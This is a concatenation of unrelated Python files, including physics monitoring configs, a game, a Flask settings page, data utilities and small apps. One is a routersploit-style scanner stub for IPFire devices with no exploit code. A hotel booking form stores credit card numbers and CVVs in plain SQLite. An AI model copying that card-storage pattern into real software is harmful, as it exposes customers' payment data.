'Tracking/TrackParameters/TrackEfficiency' # ) # Clone for Beam Halo Tracks from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import * TrackEffMon_bhmuon = TrackEffMon.clone( TKTrackCollection = 'ctfWithMaterialTracksBeamHaloMuon', AlgoName = 'BHMuonTk', FolderName = 'Tracking/TrackParameters/TrackEfficiency' ) # Split Tracking from DQM.TrackingMonitor.TrackSplittingMonitor_cfi import * TrackSplitMonitor.FolderName = 'Tracking/TrackParameters/SplitTracks' # LogMessageMonitor #### ### load which are the module to monitor from DQM.TrackingMonitorSource.EDModules2monitor_cfi import * ### load the different flavour of settings of the LogMessageMonitor module from DQM.TrackingMonitorSource.LogMessageMonitor_cff import * for module in selectedModules4cosmics : label = str(module)+'LogMessageMon' locals()[label] = 
LogMessageMonCommon.clone( pluginsMonName = pluginsMonName[module], modules = modulesLabel[module], categories = categories[module] ) locals()[label].setLabel(label) # DQM Services from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer dqmInfoTracking = DQMEDAnalyzer('DQMEventInfo', subSystemFolder = cms.untracked.string('Tracking') ) # Sequences TrackingDQMTier0_cosmicTk = cms.Sequence(TrackMon_cosmicTk*TrackEffMon_cosmicTk) TrackingDQMTier0_ckf = cms.Sequence(TrackMon_ckf*TrackEffMon_ckf) #TrackingDQMTier0_rs = cms.Sequence(TrackMon_rs*TrackEffMon_rs) #TrackingDQMTier0 = cms.Sequence(TrackMon_cosmicTk*TrackMon_ckf*TrackEffMon_ckf*TrackSplitMonitor*dqmInfoTracking) TrackingDQMTier0 = cms.Sequence(TrackMon_cosmicTk*TrackMon_ckf*TrackEffMon_ckf*TrackSplitMonitor) # MessageLog for module in selectedModules4cosmics : label = str(module)+'LogMessageMon' TrackingDQMTier0_cosmicTk += cms.Sequence(locals()[label]) TrackingDQMTier0_ckf += cms.Sequence(locals()[label]) TrackingDQMTier0 += cms.Sequence(locals()[label]) TrackingDQMTier0 += cms.Sequence(dqmInfoTracking) 0 import dat import music # | DosQuest | 7/12/2018 # # This file is filled with functions specifically for changing your equipment def changeWep(weapon): #Change player's Weapon music.playSE('Sounds/Equip.wav') if weapon == 'dagger': dat.equipmentWeapon = 'Dagger' dat.equipmentWeaponATT = 3 #Alters weapon attack stat based off of the sent 'weapon' string if weapon == 'shortsword': dat.equipmentWeapon = 'Shortsword' dat.equipmentWeaponATT = 11 if weapon == 'longsword': dat.equipmentWeapon = 'Longsword' dat.equipmentWeaponATT = 21 def changeArmor(armor): #Change player's Armor music.playSE('Sounds/Equip.wav') if armor == 'leatherarmor': dat.equipmentArmor = 'Leather Armor' dat.equipmentArmorDEF = 4 #Alters armor defense stat based off of the sent 'armor' string if armor == 'platearmor': dat.equipmentArmor = 'Plate Armor' dat.equipmentArmorDEF = 9 def changeShield(shield): #Change player's Shield music.playSE('Sounds/Equip.wav') if shield == 'shield': dat.equipmentShield = 'Shield' dat.equipmentArmorBlock = 0.25 #.25 means 25%. 
This gives the player an additional 25% damage reduction while blocking dat.equipmentShieldDEF = 2 #The shield's defense stat0 from app import app, render_template, request import json @app.route('/configuration.html', methods=['GET', 'POST']) def config(): with open('app/settings.json', 'r') as settings_file: settings = json.loads(settings_file.read()) if request.method == 'POST': tmdb_lang = request.form['tmdb_lang'] qb_ip = request.form['qb_ip'] qb_port = request.form['qb_port'] qb_pass = request.form['qb_password'] qb_username = request.form['qb_username'] torrent_filepath = request.form['file_path'] tmdb_api_key = request.form['tmdb_api_key'] # Dirty way to make it work when restrictive is off try: is_restrictive_search = request.form['restrictive'] except KeyError: is_restrictive_search = "off" new_settings = { "tmdb_language": tmdb_lang, "tmdb_api_key": tmdb_api_key, "qbittorrent_webui": { "ip": qb_ip, "port": qb_port, "credentials": { "username": qb_username, "password": } }, "default_saving_path": torrent_filepath, "strict_search": is_restrictive_search } with open('app/settings.json', 'w') as settings_file: settings_file.write(json.dumps(new_settings, indent=4)) return render_template('configuration.html', settings=new_settings) else: return render_template('configuration.html', settings=settings) #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Mon Jul 29 22:01:49 2019 @author: andrej """ import numpy as np import matplotlib.pyplot as plt import time from cddm.conf import CDDMConfig, CV2_INSTALLED, F32,F64, U16 from cddm.print_tools import print_progress, print import numba as nb if CV2_INSTALLED: import cv2 @nb.njit() def subtract_and_multiply(array, window, bg): tmp = array - bg return tmp * window @nb.vectorize([F32(U16,F32,F32),F64(U16,F64,F64)], target = "parallel") def subtract_and_multiply_vec(array, window, bg): tmp = array - bg return tmp * window def random_dual_frame_video(shape = (512,512), count = 1000): """""" for i in range(count): yield np.random.randn(*shape), np.random.randn(*shape) def fromarrays(arrays): """Creates a multi-frame iterator from given list of arrays. Parameters ---------- arrays : tuple of array-like A tuple of array-like objects that represent a single-camera videos Returns ------- video : iterator A multi-frame iterator """ return (frames for frames in zip(*arrays)) def asarrays(video, count = None): """Loads multi-frame video into numpy arrays. Parameters ---------- video : iterable A multi-frame iterator object. count : int, optional Defines how many frames are in the video. If not provided and video has an undefined length, it will try to load the video using np.asarray. This means that data copying """ def _load(array, frame): array[...] = frame print("Writing to array...") if count is None: try: count = len(video) except TypeError: out = np.asarray(video) out = tuple((out[:,i] for i in range(out.shape[1]))) return out print_progress(0, count) frames = next(video) out = tuple((np.empty(shape = (count,) + frame.shape, dtype = frame.dtype) for frame in frames)) [_load(out[i][0],frame) for i,frame in enumerate(frames)] for j,frames in enumerate(video): print_progress(j+1, count) [_load(out[i][j+1],frame) for i,frame in enumerate(frames)] print_progress(count, count) return out def asmemmaps(basename, video, count = None): """Loads multi-frame video into numpy memmaps. Parameters ---------- basename: str Base name for the filenames of the videos. video : iterable A multi-frame iterator object. 
count : int, optional Defines how many frames are in the video. If not provided it is determined by len(). """ if count is None: count = len(count) def _load(array, frame): array[...] = frame def _empty_arrays(frames): out = tuple( (np.lib.format.open_memmap(basename + "_{}.npy".format(i), "w+", shape = (count,) + frame.shape, dtype = frame.dtype) for i,frame in enumerate(frames))) return out print("Writing to memmap...") print_progress(0, count) frames = next(video) out = _empty_arrays(frames) [_load(out[i][0],frame) for i,frame in enumerate(frames)] for j,frames in enumerate(video): print_progress(j+1, count) [_load(out[i][j+1],frame) for i,frame in enumerate(frames)] print_progress(count, count) return out class VideoViewer(): fig = None def __init__(self, title = "video"): self.title = title def _prepare_image(self,im): return im def _mpl_imshow(self,im): if self.fig is None: self.fig = plt.figure() self.fig.show() ax = self.fig.add_subplot(111) ax.set_title(self.title) im = self._prepare_image(im) self.l = ax.imshow(im) else: im = self._prepare_image(im) self.l.set_data(im) self.fig.canvas.draw() self.fig.canvas.flush_events() def _cv_imshow(self, im): if self.fig is None: self.fig = self.title im = self._prepare_image(im) #scale from 0 to 1 # immin = im.min() # if immin < 0: # im -= immin # immax = im.max() # if immax > 1: # im = im/immax cv2.imshow(self.fig,im) def imshow(self, im): if CDDMConfig.cv2 == True: self._cv_imshow(im) else: self._mpl_imshow(im) def __del__(self): if CDDMConfig.cv2 == True: cv2.destroyWindow(self.fig) else: plt.close() def _pause(): if CDDMConfig.cv2 == False: plt.pause(0.001) else: cv2.waitKey(1) def play(video, fps = 100., max_delay = 0.1): t0 = None for i, frames in enumerate(video): if t0 is None: t0 = time.time() if time.time()-t0 < i/fps + max_delay: for key in list(_FIGURES.keys()): (viewer, im) = _FIGURES.pop(key) viewer.imshow(im) _pause() yield frames _FIGURES.clear() _FIGURES = {} def apply_window(video, window, inplace = False): for frames in video: if inplace == True: yield tuple((np.multiply(frame, w, frame) for w, frame in zip(window,frames))) else: yield tuple((frame*w for w, frame in zip(window,frames))) def show_video(video, id = 0): title = "video - camera {}".format(id) viewer = VideoViewer(title) for frames in video: _FIGURES[title] = (viewer, frames[id]) yield frames def show_diff(video): title = "video - difference" viewer = VideoViewer(title) for frames in video: if not title in _FIGURES: m = 2* max(frames[0].max(),frames[1].max()) im = frames[0]/m - frames[1]/m + 0.5 _FIGURES[title] = (viewer, im) yield frames if __name__ == '__main__': #from cddm.conf import set_cv2 #set_cv2(False) video = random_dual_frame_video(count = 1000) video = show_video(video) video = show_diff(video) v1,v2 = asarrays(play(video, fps = 20),count = 1000) #for frames in play(video, fps = 20): # pass import typing as t from collections import defaultdict from statistics import mean from bavard_ml_utils.utils import ImportExtraError try: import networkx as nx except ImportError: raise ImportExtraError("ml", __name__) from bavard_ml_utils.types.conversations.actions import Actor from bavard_ml_utils.types.conversations.conversation import ConversationDataset from bavard_ml_utils.types.conversations.dialogue_turns import AgentDialogueTurn, DialogueTurn, HumanAgentDialogueTurn class DSTuple(t.NamedTuple): """ A dialogue state, as defined in [1]_. It represents the state of a conversation at a given turn. 
""" bs: t.FrozenSet[str] = frozenset() """The set of dialogue slots that are populated.""" action: t.Optional[str] = None """The action that was taken.""" actor: t.Optional[str] = None """ The actor that took the action, one of ``"HUMAN"``, ``"AGENT"`` (chatbot), or ``None`` (in the case of the starting root node of the graph). """ class ConvGraph: """ Implementation of Algorithm (1) in [1]_. Can convert a :class:`~bavard_ml_utils.types.conversations.conversation.ConversationDataset` into a conversation graph, which is useful for visualizing the different paths that an agent's conversations take, as well as for evaluating dialogue act predictions using "soft" metrics. The graph can also be used for dataset augmentation in a task-oriented-dialogue training setting. Each node in the graph is a unique dialogue state, where a dialogue state is defined as a tuple of: #. the current belief state #. the action that was taken #. the type of actor who took that action (human or chatbot). A belief state is the set of dialogue slots that are populated at a given turn. References ---------- .. [1] ., ., & . (2021). Conversation Graph: Data Augmentation, Training, and Evaluation for Non-Deterministic Dialogue Management. Transactions of the Association for Computational Linguistics, 9, 36-52. """ def __init__(self, data: ConversationDataset): self.graph = nx.DiGraph() for conv in data: last_state = DSTuple() # the starting node of the graph self.add_node(last_state) for turn in conv.turns: if turn.actor == Actor.HUMAN_AGENT: continue ds = self.encode_dialogue_state(turn) self.add_node(ds) if not self.graph.has_edge(last_state, ds): self.graph.add_edge(last_state, ds, weight=1) else: self.graph[last_state][ds]["weight"] += 1 last_state = ds def add_node(self, ds: DSTuple): """ The ``ds`` tuple is used as the node's unique id, but we also add the attributes of ``ds`` as attributes of the node, so they can be interacted with easily in the graph. """ if not self.graph.has_node(ds): bs_str = ", ".join(sorted(ds.bs)) self.graph.add_node(ds, bs=bs_str, action=ds.action, actor=ds.actor) def soft_accuracy(self, y_pred: t.List[str], last_turns: t.List[DialogueTurn]) -> float: """ Calcuates the soft accuracy, which is accuracy when there is more than one acceptable answer for a prediction. Parameters ---------- y_pred : list of str A list of agent action predictions. last_turns : list of DialogueTurn A list, having the same length as ``y_pred``, of the dialogue turns the agent action predictions in ``y_pred`` are following. For example, ``y_pred[i]`` should be the agent action which was predicted as coming after the turn ``last_turns[i]``. """ num_correct = 0 for pred, last_turn in zip(y_pred, last_turns): num_correct += self.is_pred_correct(pred, last_turn) return num_correct / len(last_turns) def balanced_soft_accuracy(self, y_pred: t.List[str], last_turns: t.List[DialogueTurn]) -> float: """Same as :meth:`soft_accuracy`, but equally weights the accuracy calculation of each class, or action.""" correct: t.Dict[str, int] = defaultdict(int) out_of: t.Dict[str, float] = defaultdict(int) for pred, last_turn in zip(y_pred, last_turns): valid_next_actions = self.get_valid_next_actions(last_turn) if pred in valid_next_actions: # The prediction was right, so give full credit. correct[pred] += 1 out_of[pred] += 1 else: # The prediction was wrong, so equally penalize each of the classes that were valid. 
for label in valid_next_actions: out_of[label] += 1 / len(valid_next_actions) # Compute the soft accuracy for each class/action, then return the mean of those. return mean(correct[action] / out_of[action] for action in out_of.keys()) def is_pred_correct(self, pred: str, last_turn: DialogueTurn) -> bool: valid_next_actions = self.get_valid_next_actions(last_turn) return pred in valid_next_actions def get_valid_next_actions(self, turn: DialogueTurn) -> t.Set[str]: """ Given the dialogue state of ``turn``, find the actions of all dialogue states that directly follow ``turn`` in the conversation graph. In other words, return the valid next actions that appear after `turn` in the training data the conversation graph was constructed from. """ ds = self.encode_dialogue_state(turn) return {v[1] for u, v in self.graph.out_edges(ds)} def avg_num_valid_next_actions(self) -> int: """ The average out-degree of the conversation graph, which is equal to the average number of correct agent actions for each dialogue state in the graph. """ return mean(n for _, n in self.graph.out_degree) def save(self, path: str): nx.write_graphml(self.graph, path) @staticmethod def encode_dialogue_state(turn: DialogueTurn) -> DSTuple: """ Encodes a :obj:`~bavard_ml_utils.types.conversations.dialogue_turns.DialogueTurn` into a :class:`DSTuple`. """ if isinstance(turn, HumanAgentDialogueTurn): raise AssertionError("cannot compute dialogue state for a human agent turn") belief_state_keys = list(turn.state.slotValues.keys()) if turn.state else [] action = turn.agentAction.name if isinstance(turn, AgentDialogueTurn) else turn.userAction.intent return DSTuple(bs=frozenset(belief_state_keys), action=action, actor=turn.actor.value) import sublime import sublime_plugin class PhpactorEditorActionErrorCommand(sublime_plugin.TextCommand): def run(self, edit, message, details): sublime.run_command('tk_show_status_message', { 'message': 'Phpactor Error: ' + message }) # self.view.show_popup(message, sublime.HIDE_ON_MOUSE_MOVE_AWAY)import numpy as np def dummy_median(y_actual): # dummy median predictor return np.full(y_actual.shape, np.median(y_actual))tanc7/ArmsCommander-TestBed from __future__ import absolute_import from .autopwn import Exploit as BaseScanner class Exploit(BaseScanner): """ Scanner implementation for Ipfire vulnerabilities. 
""" __info__ = { 'name': 'Ipfire Scanner', 'description': 'Scanner module for Ipfire devices', 'authors': [ ' ', # routersploit module ], 'references': ( '', ), 'devices': ( 'Ipfire', ), } modules = ['routers/ipfire', 'cameras/ipfire', 'misc/ipfire'] #!/usr/bin/env python from distutils.core import setup setup( name='xd', version='0.1.1', description='XML Fu', author='', author_email='', url='https://github.com/dwoz/python-xd', packages=['xd'], install_requires=[ 'tox', 'lxml', ], ) from tkinter import * import sqlite3 import tkinter as tk from tkinter import messagebox window = Tk() window.title("Hotel Room Booking Form") window.geometry('1500x800') window.configure(background = "white"); a1=StringVar() b1=StringVar() c1=StringVar() d1=StringVar() e1=IntVar() f1=IntVar() g1=StringVar() h1=StringVar() i1=StringVar() j1=StringVar() k1=IntVar() l1=StringVar() m1=IntVar() p101=StringVar() p102=StringVar() p103=StringVar() def database(): title=a1.get() fname=b1.get() lname=c1.get() share=d1.get() busno=e1.get() mobno=f1.get() email=g1.get() doa=h1.get() dod=i1.get() nmcred=j1.get() credno=k1.get() expd=l1.get() cvv=m1.get() sign=p101.get() date=p102.get() pname=p103.get() db = sqlite3.connect('hotel.db') cursor=db.cursor() cursor.execute('CREATE TABLE IF NOT EXISTS HOTEL(a1 TEXT,b1 TEXT,c1 TEXT,d1 TEXT,e1 INT,f1 INT,g1 TEXT,h1 TEXT,i1 TEXT,j1 TEXT,k1 INT,l1 TEXT,m1 INT,p101 TEXT,p102 TEXT,p103 TEXT)') cursor.execute('INSERT INTO HOTEL(a1,b1,c1,d1,e1,f1,g1,h1,i1,j1,k1,l1,m1,p101,p102,p103) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', (title,fname,lname,share,busno,mobno,email,doa,dod,nmcred,credno,expd,cvv,sign,date,pname)) db.commit() msg = messagebox.showinfo( "DB Demo","SUBMITTED SUCCESSFULLY") def display(): db=sqlite3.connect('hotel.db') with db: cursor=db.cursor() my_w = tk.Tk() my_w.geometry("600x250") r_set=cursor.execute('''SELECT * from HOTEL '''); i=0 for HOTEL in r_set: for j in range(len(HOTEL)): e = Entry(my_w, width=10, fg='blue') e.grid(row=i, column=j) e.insert(END, HOTEL[j]) i=i+1 a = Label(window ,text = "Title ").grid(row = 0,column = 0,sticky = "NSEW") b = Label(window ,text = "First Name ").grid(row = 1,column = 0,sticky = "NSEW") c = Label(window ,text = "Last Name ").grid(row = 2,column = 0,sticky = "NSEW") d = Label(window ,text = "Share With ").grid(row = 3,column = 0,sticky = "NSEW") e = Label(window ,text = "Buisness Number ").grid(row = 4,column = 0,sticky = "NSEW") f = Label(window ,text = "Mobile Number").grid(row = 5,column = 0,sticky = "NSEW") g = Label(window ,text = "Email Address ").grid(row = 6,column = 0,sticky = "NSEW") h = Label(window ,text = "Date of Arrival ").grid(row = 7,column = 0,sticky = "NSEW") i = Label(window ,text = "Date of Departure ").grid(row = 8,column = 0,sticky = "NSEW") j = Label(window ,text = "Name on Credit Card ").grid(row = 9,column = 0,sticky = "NSEW") k = Label(window ,text = "Credit Card Number ").grid(row = 10,column = 0,sticky = "NSEW") l = Label(window ,text = "Expiry Date ").grid(row = 11,column = 0,sticky = "NSEW") m = Label(window ,text = "CVV Number ").grid(row = 12,column = 0,sticky = "NSEW") n = Label(window ,text = "Payment Method ").grid(row = 13,column = 0,sticky = "NSEW") CheckVar1 = IntVar() CheckVar2 = IntVar() C1 = Checkbutton(window, text = "Credit Card ", variable = CheckVar1, \ onvalue = 1, offvalue = 0, height=1, \ width = 20) C1.grid(row = 13, column = 1 , sticky = "NSEW") C2 = Checkbutton(window, text = "Debit Bank Transfer ", variable = CheckVar2, \ onvalue = 1, offvalue = 0, height=1, \ width = 20) 
C2.grid(row = 13, column = 2 , sticky = "NSEW") p = Label(window ,text = "Negotiated Rates : ").grid(row = 14,column = 0 , sticky = "NSEW") g = Label(window ,text = "Deluxe Room Single ").grid(row = 15,column = 0 , sticky = "NSEW") g1 = Label(window ,text = " R1700 ").grid(row = 15,column = 1 , sticky = "NSEW") h = Label(window ,text = "Deluxe Room Double ").grid(row = 15,column = 2 , sticky = "NSEW") h1 = Label(window ,text = " R1700 ").grid(row = 15,column = 3 , sticky = "NSEW") g = Label(window ,text = "Suites Room Single ").grid(row = 16,column = 0 , sticky = "NSEW") g1 = Label(window ,text = " R1700 ").grid(row = 16,column = 1 , sticky = "NSEW") h = Label(window ,text = "Suites Room Double ").grid(row = 16,column = 2,sticky = "NSEW") h1 = Label(window ,text = " R1700 ").grid(row = 16,column = 3 ,sticky = "NSEW") p1 = Label(window ,text = "Room Preference : ").grid(row = 17,column = 0,sticky = "NSEW") CheckVar11 = IntVar() CheckVar22 = IntVar() C3 = Checkbutton(window, text = "King Bed ", variable = CheckVar11, \ onvalue = 1, offvalue = 0, height=1, \ width = 20) C3.grid(row = 18, column = 0) C4 = Checkbutton(window, text = "Twin - Two Single Beds ", variable = CheckVar22, \ onvalue = 1, offvalue = 0, height=1, \ width = 20) C4.grid(row = 18, column = 1) line1 = Label(window, text="The above rates are quoted per room, per night. The rates include breakfast, 14% vat, and Excludes 1% Tourism Levy\n and a voluntary R10 donation to the Arabella Community Trust that will be levies onto your account.", bg="white") line2 = Label(window, text="Total amount payable ZAR__ x_ nights = ZAR__ due to Arabella\n Hotel and Spa", bg="white") line3 = Label(window, text="Credit Card will be charged on receipt of this form and details will also be used to settle all incidentals not settle on\n departure. A copy of the final folio will be sent to you should there be any unsettled charges.", bg="white") line4 = Label(window, text="In order to qualify for the above rates, your booking needs to be made on or before 15th January 2016", bg="white") line5 = Label(window, text="Terms and conditions can be found on the next page.", bg="white") line6 = Label(window, text="The rate is valid for seven days before and after the conference dates. 
Check in time is 14:00 & check out time is 11:00", bg="white") line7 = Label(window, text="By your signature hereto, you are accepting all terms and conditions specified on this form and confirm that all information\n given is current and accurate.", bg="white") line1.grid(row=20, column=0,columnspan=4) line2.grid(row=21, column=0,columnspan=4) line3.grid(row=22, column=0,columnspan=4) line4.grid(row=23, column=0,columnspan=4) line5.grid(row=24, column=0,columnspan=4) line6.grid(row=25, column=0,columnspan=4) line7.grid(row=26, column=0,columnspan=4) p1 = Label(window ,text = "Signature : ").grid(row = 27,column = 0,sticky = "NSEW") p1 = Label(window ,text = "Print Name: ").grid(row = 27,column = 2,sticky = "NSEW") p1 = Label(window ,text = "Date : ").grid(row = 28,column = 0,sticky = "NSEW") a1 = Entry(window) a1.grid(row = 0,column = 1) b1 = Entry(window) b1.grid(row = 1,column = 1) c1 = Entry(window) c1.grid(row = 2,column = 1) d1 = Entry(window) d1.grid(row = 3,column = 1) e1 = Entry(window) e1.grid(row = 4,column = 1) f1 = Entry(window) f1.grid(row = 5,column = 1) g1 = Entry(window) g1.grid(row = 6,column = 1) h1 = Entry(window) h1.grid(row = 7,column = 1) i1 = Entry(window) i1.grid(row = 8,column = 1) j1 = Entry(window) j1.grid(row = 9,column = 1) k1 = Entry(window) k1.grid(row = 10,column = 1) l1 = Entry(window) l1.grid(row = 11,column = 1) m1 = Entry(window) m1.grid(row = 12,column = 1) p101 = Entry(window) p101.grid(row = 27,column = 1,sticky = "NSEW") p102 = Entry(window) p102.grid(row = 27,column = 3,sticky = "NSEW") p103 = Entry(window) p103.grid(row = 28,column = 1,sticky = "NSEW") btn = Button(window ,text="SUBMIT",command = database,width=20).grid(row=30,column=2) btn = Button(window,text="DISPLAY RECORD(s)",command=display,width=20).grid(row=30,column=3) window.mainloop() import sqlite3 my_conn = sqlite3.connect('hotel.db') import tkinter as tk from tkinter import * my_w = tk.Tk() my_w.geometry("1300x250") r_set=my_conn.execute('''SELECT * from HOTEL '''); i=0 # row value inside the loop for HOTEL in r_set: for j in range(len(HOTEL)): e = Entry(my_w, width=10, fg='blue') e.grid(row=i, column=j) e.insert(END, HOTEL[j]) i=i+1 my_w.mainloop()100-1000 # Copyright lowRISC contributors. # Licensed under the Apache License, Version 2.0, see LICENSE for details. 
# SPDX-License-Identifier: Apache-2.0 import logging as log from mako import exceptions from mako.template import Template from pkg_resources import resource_filename from .item import NodeType from .xbar import Xbar def generate_tb(xbar, dv_path): #xbar: Xbar -> str # list all the generate files for TB tb_files = [ "xbar_env_pkg__params.sv", "tb__xbar_connect.sv", "xbar.sim.core", "xbar.bind.sv", "Makefile" ] for fname in tb_files: tpl = Template(filename=resource_filename('tlgen', fname + '.tpl')) # some files need to be renamed if fname == "xbar.sim.core": fname = "xbar_%s_sim.core" % (xbar.name) elif fname == "xbar.bind.sv": fname = "xbar_%s_bind.sv" % (xbar.name) dv_filepath = dv_path / fname with dv_filepath.open(mode='w', encoding='UTF-8') as fout: try: fout.write(tpl.render(xbar=xbar)) except: log.error(exceptions.text_error_template().render()) from django.urls import path from users import views as user_views from django.contrib.auth import views as auth_views from users import views as user_views urlpatterns = [ path('register/', user_views.register, name='register'), path('login/', auth_views.LoginView.as_view(template_name='users/Userlogin.html'), name='login'), path('logout/', auth_views.LogoutView.as_view(template_name='users/Userlogout.html'), name='logout'), path('profile/', user_views.profile, name='profile'), ]import pickle # импорт библиотеки для сохранения объектов from os.path import exists # импорт метода для определения наличия файла def menu(num): """ Функция вывода меню :param num: сумма наличных денег :return: ответ пользователя """ print(f'Доступная сумма: {num} руб.', end='\n\n') # вывод наличных денег с добавлением пустой строки print('1. Пополнить счет') print('2. Совершить покупку') print('3. История покупок') print('4. Сбросить значения') print('5. 
Выход') ans = input('Введите номер пункта: ') # ввод пункт меню пользователем return ans def add(num, hist): """ Добавление суммы покупки и ее наименования покупки :param num: количество наличных денег :param hist: список покупок :return: измененное количество наличных денег и список покупок """ sale = input('Введите сумму покупки: ') # ввод суммы покупки while not sale.replace('.', '', 1).isdigit(): # пока ввод пользователя с убиранием точек не цифры sale = input('Введите сумму покупки: ') # снова ввести суммы sale = float(sale) # перевод суммы в дробный тип данных if sale > num: # если сумма покупки больше, чем сумма наличных денег print('Сумма покупки больше наличных денег') else: # иначе name = input('Введите название покупки: ') # ввод название покупки hist.append((name, sale)) # добавление названия и суммы покупки в архив истории num -= sale # вычитание суммы покупки из наличных денег save_sum((num, history)) # сохранение обновленной суммы и истории покупок return num, hist def save_sum(data): """ Сохранение данных в файле data: данные для сохранения """ with open('exp.pickle', mode='wb') as f: # открытие файла для байтовой записи pickle.dump(data, f) # запись данных в файл if exists('exp.pickle'): # если файл существует в текущем катологе with open('exp.pickle', mode='rb') as f: # то открыть его для байтого чтения num, history = pickle.load(f) # чтение данных из файла и запись в переменные else: # иначе num = 0 history = [] # объявление глобальных переменных while True: # вечный цикл ans = menu(num) # получение ответа пользователя while ans not in ['1', '2', '3', '4', '5']: # пока ответ не в списке ans = menu(num) # получение ответа пользователя if ans == '1': # если выбран ответ 1 amount = input('Введите сумму: ') # ввод добавляемой суммы наличных денег while not amount.replace('.', '', 1).isdigit(): # пока ввод пользователя с убиранием точек не цифры amount = input('Введите сумму: ') # повторить ввод суммы num += float(amount) # добавить сумму к общей сумме наличных денег save_sum((num, history)) # сохранение обновленной суммы и истории покупок elif ans == '2': # если ответ 2 num, history = add(num, history) # запустить функцию добавления продуктов elif ans == '3': # если ответ 3 for name, sale in history: # перебрать все элементы списка истории print(f'Было куплено {name} за {sale} руб.') # и вывести его elif ans == '4': # если ответ 4 num = 0 history = [] # обнуление значений переменных save_sum((num, history)) # и сохранение в файле else: # иначе break # выйти из основного цикла print() B0ney/Epic-File-Sorter PROGRAMS = ["jar","exe","bin","deb","rpm","msi","appimage","dmg"] ARCHIVES = ["zip","7z","tar","bz2","rar","xz","gz"] AUDIO = ["mp3","mp2","wav","ogg","aac","flac","alac","dsd","mqa","m4a"] VIDEO = ["mp4","mkv","flv","mov","avi","webm"] IMAGE = ["jpeg","jpg","png","bmp","gif"] DOCS = ["pdf","txt","odt","docx","rtf"] SLIDES = ["ppt","odp","pptx"] SPREADSHEET = ["xlsx"]# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
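# --- Hedged sketch of the per-key date adjustment used below ------------------
# OurWorldInDataSource._adjust_date (defined below) merges per-key metadata and
# shifts each record's date by that key's aggregate_report_offset. This is a
# self-contained pandas illustration of the same idea; the column names match
# the source below, but _shift_date is a stand-in helper, not lib.time.date_offset.
from datetime import datetime, timedelta

import pandas as pd

def _shift_date(date_str: str, offset_days: int) -> str:
    """Shift an ISO date string by offset_days (stand-in helper)."""
    shifted = datetime.fromisoformat(date_str) + timedelta(days=offset_days)
    return shifted.date().isoformat()

def adjust_dates_example() -> pd.DataFrame:
    data = pd.DataFrame({"key": ["US", "GB"], "date": ["2020-05-01", "2020-05-01"]})
    metadata = pd.DataFrame({"key": ["US", "GB"], "aggregate_report_offset": [0, -1]})
    merged = data.merge(metadata, how="left", on="key")
    merged["aggregate_report_offset"] = merged["aggregate_report_offset"].fillna(0).astype(int)
    merged["date"] = merged.apply(
        lambda row: _shift_date(row["date"], row["aggregate_report_offset"]), axis=1
    )
    # Keep only the columns of the original data frame, as the source below does.
    return merged[data.columns]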
from typing import Any, Dict, List from pandas import DataFrame, isnull from lib.cast import safe_int_cast from lib.data_source import DataSource from lib.time import datetime_isoformat, date_offset from lib.utils import get_or_default class OurWorldInDataSource(DataSource): @staticmethod def _adjust_date(data: DataFrame, metadata: DataFrame) -> DataFrame: """ Adjust the date of the data based on the report offset """ # Save the current columns to filter others out at the end data_columns = data.columns # Filter auxiliary dataset to only get the relevant keys data = data.merge(metadata, suffixes=("", "aux_"), how="left") # Perform date adjustment for all records so date is consistent across datasets data.aggregate_report_offset = data.aggregate_report_offset.apply(safe_int_cast) data["date"] = data.apply( lambda x: date_offset(x["date"], get_or_default(x, "aggregate_report_offset", 0)), axis=1, ) return data[data_columns] def parse_dataframes( self, dataframes: List[DataFrame], aux: Dict[str, DataFrame], **parse_opts ) -> DataFrame: data = ( dataframes[0] .rename( columns={ "iso_code": "3166-1-alpha-3", "new_cases": "new_confirmed", "new_deaths": "new_deceased", "new_tests": "new_tested", "total_cases": "total_confirmed", "total_deaths": "total_deceased", "total_tests": "total_tested", } ) .merge(aux["country_codes"]) ) # Adjust the date of the records to match local reporting data = self._adjust_date(data, aux["metadata"]) return data import os import logging import socket from mcrcon import MCRcon log = logging.getLogger("bot") # get RCON credentials RCON_URL = os.getenv('RCON_URL') RCON_PASSWORD = os.getenv('RCON_PASSWORD') # check that the Minecraft server is responsive def get_rcon_status(): log.info(f"get_rcon_status: getting status...") try: return submit_rcon_command("list").startswith("There") except socket.timeout: log.info(f"get_rcon_status: Connection timed out, returning False") return False except ConnectionRefusedError: log.info(f"get_rcon_status: Connection refused, returning False") return False # get player list # Use get_rcon_status() to check server is available before using def get_player_list(): resp = submit_rcon_command("list") if resp.startswith('There are 0'): return "There are no players currently playing." 
else: return resp.replace('_', '\_') # submit a command to the server # Use get_rcon_status() to check server is available before using def submit_rcon_command(cmd: str): log.info(f"rcon_submit: submitting command {cmd} to url {RCON_URL}...") with MCRcon(RCON_URL, RCON_PASSWORD) as mcr: return mcr.command(cmd)import StudentHandler import TeacherHandler import webapp2 app = webapp2.WSGIApplication([ ('/', StudentHandler.Default), ('/student', StudentHandler.SubmitStudent), ('/student/(\d+)', StudentHandler.SingleStudent), ('/statistics/studentperquarter/(\d+)', StudentHandler.QuaterAnalysis), ('/statistics/quarter/(\d+)', StudentHandler.SubjectAnalysis), ('/statistics/quarter', StudentHandler.SubjectQuaterAnalysis), ('/teacher/statistics/quarter', TeacherHandler.DisplaySubjectQuaterAnalysis), ('/teacher/statistics/quarter/(\d+)', TeacherHandler.DisplaySubjectAnalysis), ('/teacher/statistics/studentperquarter/(\d+)', TeacherHandler.DisplayQuaterAnalysis), ('/teacher', TeacherHandler.MainForm), ], debug=True)class Firmware: def __init__(self): self.version = None self.sign_method = None self.sign = None self.file_url = None self.file_size = None #!/usr/bin/python3 import os import re import glob import numpy as np import SimpleITK as sitk from psutil import cpu_count from operator import sub num_threads = cpu_count(logical=False) print(' Set number of threads to ', num_threads) os.environ["OMP_NUM_THREADS"] = str(num_threads) os.environ['ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS'] = str(num_threads) sitk.ProcessObject.SetGlobalDefaultNumberOfThreads(num_threads) ############################################################################### def 